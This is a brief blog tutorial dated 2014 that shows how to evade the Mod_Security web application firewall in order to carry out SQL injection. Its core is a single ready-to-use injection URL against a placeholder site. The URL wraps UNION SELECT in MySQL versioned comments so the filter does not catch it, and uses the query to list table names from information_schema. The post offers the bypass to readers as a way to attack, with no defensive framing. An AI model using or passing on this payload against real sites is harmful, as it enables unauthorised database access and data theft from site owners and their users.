[TUTORIAL] Mod_Security bypass (SQLi)
Wednesday, February 26, 2014
Today i will show you how to bypass Mod_Security WAF for SQLi attack.
Probably, most of you did querie UNION SELECT 1,2,3,4... etc and saw message like "Not Acceptable!"
Take a look at following picture:
This message is generated by WAF called Mod_Security and here is solution how you can bypass this WAF:
Code:
http://www.vulnsite.com/index.php?id=-13+/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
All comments [ 0 ]
Your comments